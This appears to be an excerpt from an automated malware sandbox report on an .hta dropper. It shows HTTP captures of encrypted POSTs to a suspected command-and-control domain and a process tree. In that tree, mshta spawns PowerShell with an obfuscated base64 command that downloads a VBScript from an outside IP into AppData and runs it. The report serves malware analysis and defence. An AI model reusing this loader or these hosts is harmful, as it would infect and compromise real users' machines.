                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874442101 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874460936 CET672INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874478102 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874494076 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874511957 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874528885 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.879501104 CET1236INData Raw: 6c 5a 79 54 62 67 51 4c 70 31 54 70 51 41 53 4c 56 30 71 35 76 55 47 64 62 51 77 58 72 48 30 61 65 56 52 48 75 4e 43 45 68 30 53 4c 74 30 31 61 72 30 53 51 72 33 55 4c 74 75 36 42 64 73 42 76 6f 43 74 48 52 72 74 48 65 34 4b 65 30 6a 62 42 6a 56
                                                                                                                                                                                                            Data Ascii: lZyTbgQLp1TpQASLV0q5vUGdbQwXrH0aeVRHuNCEh0SLt01ar0SQr3ULtu6BdsBvoCtHRrtHe4Ke0jbBjVxWTNmJ1oI1zvvEjNBetsVLskcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNx


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.44974446.173.214.14802580C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Jan 8, 2025 11:09:48.884488106 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Referer: http://prfkokybvrvkyi.org/
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                            Content-Length: 337
                                                                                                                                                                                                            Host: prolinice.ga
                                                                                                                                                                                                            Jan 8, 2025 11:09:48.884529114 CET337OUTData Raw: 6e e2 91 f6 c3 38 f3 16 1c 16 c1 12 3a 50 f2 8f a9 27 91 5a 41 8e be ec 85 ec 0e 19 ad 4e 32 03 4b b3 ea b5 7b de 84 a6 12 cf c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 04 8f 94 9a
                                                                                                                                                                                                            Data Ascii: n8:P'ZAN2K{ &7H8.6hEv:RY;PL&3EpJ$fxu28$":4_OB/_#aQ[`[)odcb%&v.j.Je5~P$EBKQw'Xu&9xrwf;%^z5
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834240913 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Wed, 08 Jan 2025 10:09:49 GMT
                                                                                                                                                                                                            Server: Apache/2.4.59 (Debian)
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 52d53_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~Yr [TRUNCATED]
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834275007 CET224INData Raw: 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b
                                                                                                                                                                                                            Data Ascii: P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gt
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834285975 CET1236INData Raw: 67 bd 63 db 08 77 af d3 8c 6d 56 60 26 f6 24 45 a8 5e 97 11 75 41 b4 77 49 98 30 71 b8 06 83 3a dd 3c bd f3 ae 0b 02 a2 80 23 7f 02 79 66 c6 fa 48 ee 4a d1 79 d0 3c 96 bd 13 34 1f 1d 11 5e 2f 7c 94 67 02 e3 78 0f 84 ce c3 a5 b3 67 98 61 44 eb 06
                                                                                                                                                                                                            Data Ascii: gcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/Z|-t[DDgd/pXLid*C!@qv^=:g{$ybm<@
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834301949 CET1236INData Raw: e0 77 5c 98 a2 fe 1c 8d ed 29 14 9b f8 aa 38 f5 1e c1 35 2f 97 51 4e 7c 84 77 95 ee de c1 ce 9f 6e 32 2b 10 77 b2 d9 30 2f 02 81 e1 38 a6 a6 13 f3 02 84 36 53 75 ea a1 a0 c1 cc 39 0a f5 bc 99 22 4d 2e 18 6b bc fe 95 24 d6 71 df 57 5b 91 50 f6 b4
                                                                                                                                                                                                            Data Ascii: w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{4s/X/5e?s$lQ7]FsF[7):lFp?.%8*s,t!tN2Y~
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834322929 CET448INData Raw: 61 75 c8 9e 29 8d 8f 4e 72 29 15 bc f2 3c 68 2f 82 44 67 71 60 3f 94 9d 7c 6c 44 9a d5 97 1d 7e 04 9e a2 63 5e 91 25 97 02 bc cb 75 1e 3d 91 36 4e 21 8c cb b0 d0 e4 5c eb b3 1b 7d da 01 14 01 4b 31 34 e6 fa 9c b0 4b 48 1a 3b 86 e0 7a 95 3c 1d 96
                                                                                                                                                                                                            Data Ascii: au)Nr)<h/Dgq`?|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#B>ef)wO/jHP:+ -/_A]K*_kkOly1Tp`|_TI',
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834367037 CET1236INData Raw: 82 a5 b8 88 82 53 1c 14 4f 5b 01 31 e7 6d 82 e4 55 5b de a4 e2 46 ce 13 f0 19 82 6e e9 44 35 47 af 75 f0 c8 bd 5d ac a3 ff 35 a9 bd ef 0a 49 c2 1c 95 c9 e7 ac 95 ab f8 c7 34 c9 97 34 a6 36 ce 46 88 14 64 cd 68 6a 1b bd 96 39 41 77 ff 29 d3 04 c0
                                                                                                                                                                                                            Data Ascii: SO[1mU[FnD5Gu]5I446Fdhj9Aw)-?Uu^qrP0>ZWPH{{X.Dbd<N;}cHI3},[>q]Sz2[2"eULE{)S\fL5Lyc5|
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834378004 CET1236INData Raw: 95 3f a8 66 41 38 85 7f 99 76 d6 6a 2e fa 60 6a 44 6b 4a 3b 93 59 86 b6 3a 4b 30 37 5a 8f 11 18 45 17 83 82 91 5f 0d 67 8e 0e f6 92 6e 1d 74 89 12 a1 b7 11 ce 3b 07 ba 3b f6 a7 2d 78 17 73 33 d9 9a 7e 10 a6 b9 46 d8 d0 c6 1e 77 30 78 58 64 b2 b6
                                                                                                                                                                                                            Data Ascii: ?fA8vj.`jDkJ;Y:K07ZE_gnt;;-xs3~Fw0xXdw^D3~Q-]2(-OmwIKC+<ymmCx>sHXomSf%54m{gxKi.h_TKdFLN0xC
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834389925 CET448INData Raw: d7 ea 2f 55 6d f8 e1 71 30 d4 c0 d6 b1 5b 56 68 86 db 24 22 14 c7 75 6c 19 5b 7f 01 65 10 03 78 34 13 ae c8 b7 b0 d2 cd 13 3a b1 86 20 cc ba f6 a4 47 81 de 12 c9 42 38 d8 68 d7 83 2c 6c 80 56 56 d0 2d e6 5e 86 8a 43 a0 30 f0 83 5a 2d 9a 7a 64 a2
                                                                                                                                                                                                            Data Ascii: /Umq0[Vh$"ul[ex4: GB8h,lVV-^C0Z-zdzJL_`e6.g%3Jaoc%]p'P]vm]q6@3\i@Yg>48|[B\a:M-@+"ko?eQ]*6-T"Vbl
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834484100 CET1236INData Raw: 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f 3e 4a 0c d7 79 3b 83 74 21 4f 0a a0 14 6a e2 95 a1 99 f8 12 7d b0 e3 d3 ba 48 78 e2 e8 71 e9 9c e6 a3 dc 91 cb d4 a3 f1 0d 3a c6 3f b3 f3 d9 97 91 49 d3 be 04
                                                                                                                                                                                                            Data Ascii: z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[KgeK4Zb4rdi 8?}jO;
                                                                                                                                                                                                            Jan 8, 2025 11:09:49.834549904 CET1236INData Raw: 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a ba 08 48 9b fb ba 78 e4 ac 74 0f dc fb aa 1d 89 45 99 38 5e 4c 93 a3 ec 34 c1 0a 2c cb dc 87 b2 14 06 72 07 32 c1 1b 09 c1 94 54 35 6e 39 6e 0d eb 44 30 ce f3
                                                                                                                                                                                                            Data Ascii: }b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\LMj8Lcyy:_w|O|:83GU.R=}:iq9[N


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.44974646.173.214.14807272C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.438980103 CET275OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Referer: http://prolinice.ga/
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                            Content-Length: 4431
                                                                                                                                                                                                            Host: prolinice.ga
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.439060926 CET4431OUTData Raw: 6e e2 91 f6 c3 38 f3 16 1c 16 c1 12 3a 50 f2 8f a9 27 91 5a 41 8e be ec 85 ec 0e 19 ad 4e 32 03 4b b3 ea b5 7b de 84 a6 12 cf c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 70 a4 c2 a2
                                                                                                                                                                                                            Data Ascii: n8:P'ZAN2K{eug]H8.6hEvRY;PLpOc~k_!z1rJC\S7W/x*>x :xGresn*q~j@%jux^2~mt-GD#SO`tAEi*y}`8
                                                                                                                                                                                                            Jan 8, 2025 11:09:54.445406914 CET584INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Wed, 08 Jan 2025 10:09:54 GMT
                                                                                                                                                                                                            Server: Apache/2.4.59 (Debian)
                                                                                                                                                                                                            Content-Length: 409
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:05:08:54
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\begoodforeverythinggreatthingsformebetterforgood.hta"
                                                                                                                                                                                                            Imagebase:0xd50000
                                                                                                                                                                                                            File size:13'312 bytes
                                                                                                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:05:08:54
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:05:08:54
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:05:08:54
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                                                                                                                                                                                                            Imagebase:0x1f0000
                                                                                                                                                                                                            File size:433'152 bytes
